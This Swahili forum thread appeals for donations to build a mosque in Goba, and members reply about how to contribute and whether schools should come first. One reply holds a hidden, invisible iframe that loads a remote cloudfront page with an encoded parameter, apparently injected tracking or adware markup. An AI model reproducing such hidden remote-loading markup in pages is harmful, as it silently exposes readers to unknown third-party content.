Changia masjid ijengwe

Status
Not open for further replies.

Mzito Kabwela

JF-Expert Member
Nov 28, 2009
18,857
7,615
Ukiwa wewe ni Muumin wa kweli, unaombwa uchangie Masjid Goba ijengwe. Kwa sasa Hali ya Masjid yetu iko katika hali hii...

Nimefika hapa leo na mimeonana na Imam wa msikiti huu...Tumeongea mengi ila kikubwa mahitaji yao ni mengi...wanahitaji matofali...mbao..mabati...nond
<wbr style="color: rgb(0, 0, 0); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px; text-align: left; ">
o...cement ...n.k...Nilikwenda na kiasi mlichojaaliwa kuchangia waislam na nimewakabidhi...kwa niaba yao tunawashukuru saana..Mwenyezi Mungu atawazidishia katika hili...Ila kwa wale ambao hamjajaaliwa Inshaallah Mwenyezi Mungu awafanyie wepesi ili muweze kuchangia...chochote ulichonacho Muislam wachangie ndugu zetu hawa. Tujitengenezee pepo yetu waislam kwa kuwachangia ndugu zetu...Mwenye chochote awasiliane na mimi au dada khardirjer ( spelling please)...Wasalaam!

Musjid.jpg View attachment 46909
 
Wakristo hawaruhusiwi kuchangia !.

Ukiwa wewe ni Muumin wa kweli, unaombwa uchangie Masjid Goba ijengwe. Kwa sasa Hali ya Masjid yetu iko katika hali hii...

Nimefika hapa leo na mimeonana na Imam wa msikiti huu...Tumeongea mengi ila kikubwa mahitaji yao ni mengi...wanahitaji matofali...mbao..mabati...nond
<WBR style="TEXT-ALIGN: left; LINE-HEIGHT: 14px; FONT-FAMILY: 'lucida grande', tahoma, verdana, arial, sans-serif; COLOR: rgb(0,0,0); FONT-SIZE: 11px">
o...cement ...n.k...Nilikwenda na kiasi mlichojaaliwa kuchangia waislam na nimewakabidhi...kwa niaba yao tunawashukuru saana..Mwenyezi Mungu atawazidishia katika hili...Ila kwa wale ambao hamjajaaliwa Inshaallah Mwenyezi Mungu awafanyie wepesi ili muweze kuchangia...chochote ulichonacho Muislam wachangie ndugu zetu hawa. Tujitengenezee pepo yetu waislam kwa kuwachangia ndugu zetu...Mwenye chochote awasiliane na mimi au dada khardirjer ( spelling please)...Wasalaam!

View attachment 46908View attachment 46909
 
mkuu...mbona maelezo hayajitoshelezi....? huyo Dada Khadija tunampataje na wewe tunawasiliana na wewe kwa njia ipi....?....kuwa serious kidogo mkuu......
 
attachment.php

Shule je? Vyuo vikuu je?
Duh! hiyo kibla! sijui huyo shekhe anayeswalisha hapo ana hali gani!

<iframe style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>
 
toa namba za m pesa kwenye masuala ya kiiman acheni maskhara.
nina mchango niuwasilisheje?
 
Kuswali hakuchagui jengo.......huu ni msikiti wa kijijini kwetu

6704_jse_CIMG2796.jpg
mkuu, I AGREE WITH YOU.
Inawezekana watu wa kijiji hicho wali-prioritize ujenzi wa shule kwanza......huwezi kuchangia shule na msikiti at the same time.
hali yenyewe ya kijijini ilivyo ngumu!!
 
Status
Not open for further replies.
Back
Top Bottom